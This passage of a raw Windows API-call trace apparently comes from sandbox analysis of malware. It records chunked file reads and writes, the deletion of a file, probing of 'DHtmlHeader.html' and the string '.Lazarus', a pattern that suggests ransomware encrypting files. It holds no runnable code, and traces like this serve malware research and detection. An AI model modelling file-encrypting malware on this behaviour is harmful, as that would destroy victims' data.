lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.692] GetLastError () returned 0x0 [0073.692] SetLastError (dwErrCode=0x0) [0073.692] GetLastError () returned 0x0 [0073.692] SetLastError (dwErrCode=0x0) [0073.692] GetLastError () returned 0x0 [0073.692] SetLastError (dwErrCode=0x0) [0073.692] GetLastError () returned 0x0 [0073.692] SetLastError (dwErrCode=0x0) [0073.692] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.692] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.693] GetLastError () returned 0x0 [0073.693] SetLastError (dwErrCode=0x0) [0073.693] GetLastError () returned 0x0 [0073.693] SetLastError (dwErrCode=0x0) [0073.693] GetLastError () returned 0x0 [0073.693] SetLastError (dwErrCode=0x0) [0073.693] GetLastError () returned 0x0 [0073.693] SetLastError (dwErrCode=0x0) [0073.693] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.693] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.694] GetLastError () returned 0x0 [0073.694] SetLastError (dwErrCode=0x0) [0073.694] GetLastError () returned 0x0 [0073.694] SetLastError (dwErrCode=0x0) [0073.694] GetLastError () returned 0x0 [0073.694] SetLastError (dwErrCode=0x0) [0073.694] GetLastError () returned 0x0 [0073.694] SetLastError (dwErrCode=0x0) [0073.694] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.694] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.694] GetLastError () returned 0x0 [0073.694] SetLastError (dwErrCode=0x0) [0073.694] GetLastError () returned 0x0 [0073.695] SetLastError (dwErrCode=0x0) [0073.695] GetLastError () returned 0x0 [0073.695] SetLastError (dwErrCode=0x0) [0073.695] GetLastError () returned 0x0 [0073.695] SetLastError (dwErrCode=0x0) [0073.695] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.695] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.695] GetLastError () returned 0x0 [0073.695] SetLastError (dwErrCode=0x0) [0073.695] GetLastError () returned 0x0 [0073.695] SetLastError (dwErrCode=0x0) [0073.696] GetLastError () returned 0x0 [0073.696] SetLastError (dwErrCode=0x0) [0073.696] GetLastError () returned 0x0 [0073.696] SetLastError (dwErrCode=0x0) [0073.696] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.696] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.696] GetLastError () returned 0x0 [0073.696] SetLastError (dwErrCode=0x0) [0073.696] GetLastError () returned 0x0 [0073.696] SetLastError (dwErrCode=0x0) [0073.696] GetLastError () returned 0x0 [0073.696] SetLastError (dwErrCode=0x0) [0073.696] GetLastError () returned 0x0 [0073.697] SetLastError (dwErrCode=0x0) [0073.697] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x882, lpOverlapped=0x0) returned 1 [0073.697] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.697] GetLastError () returned 0x0 [0073.697] SetLastError (dwErrCode=0x0) [0073.697] GetLastError () returned 0x0 [0073.697] SetLastError (dwErrCode=0x0) [0073.697] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.697] GetLastError () returned 0x0 [0073.697] SetLastError (dwErrCode=0x0) [0073.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cf20 [0073.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0073.698] GetLastError () returned 0x0 [0073.698] SetLastError (dwErrCode=0x0) [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0073.698] WriteFile (in: hFile=0x40c, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x890, lpOverlapped=0x0) returned 1 [0073.698] GetLastError () returned 0x0 [0073.698] SetLastError (dwErrCode=0x0) [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0073.698] GetLastError () returned 0x0 [0073.698] SetLastError (dwErrCode=0x0) [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0073.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0073.698] CloseHandle (hObject=0x40c) returned 1 [0073.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0073.700] CloseHandle (hObject=0x410) returned 1 [0073.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0073.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.700] AreFileApisANSI () returned 1 [0073.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0073.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d160, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.700] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.701] GetFileType (hFile=0x410) returned 0x1 [0073.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0073.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0073.702] GetLastError () returned 0xb7 [0073.702] SetLastError (dwErrCode=0xb7) [0073.702] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0073.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0073.703] CloseHandle (hObject=0x410) returned 1 [0073.703] AreFileApisANSI () returned 1 [0073.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0073.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0073.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Client\\UiInfo.xml") returned 40 [0073.703] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Client\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\client\\uiinfo.xml")) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0073.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.705] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.705] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.705] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x77f, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ĭ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蜐\x07̧비聐葐\x08賂̧")) returned 0 [0073.705] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0073.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0073.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.706] AreFileApisANSI () returned 1 [0073.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\DHtmlHeader.html", lpUsedDefaultChar=0x0) returned 39 [0073.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0073.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.706] AreFileApisANSI () returned 1 [0073.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d268 [0073.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d268, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.706] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.706] GetFileType (hFile=0x428) returned 0x1 [0073.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0073.707] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0073.707] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0073.707] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0073.707] CloseHandle (hObject=0x428) returned 1 [0073.707] AreFileApisANSI () returned 1 [0073.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0073.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.707] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.707] GetFileType (hFile=0x428) returned 0x1 [0073.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0073.708] CloseHandle (hObject=0x428) returned 1 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0073.708] AreFileApisANSI () returned 1 [0073.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0073.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d528 [0073.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d528, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0073.709] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6)) returned 1 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0073.709] AreFileApisANSI () returned 1 [0073.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.709] GetLastError () returned 0x0 [0073.709] SetLastError (dwErrCode=0x0) [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0073.709] GetLastError () returned 0x0 [0073.709] SetLastError (dwErrCode=0x0) [0073.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0073.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) 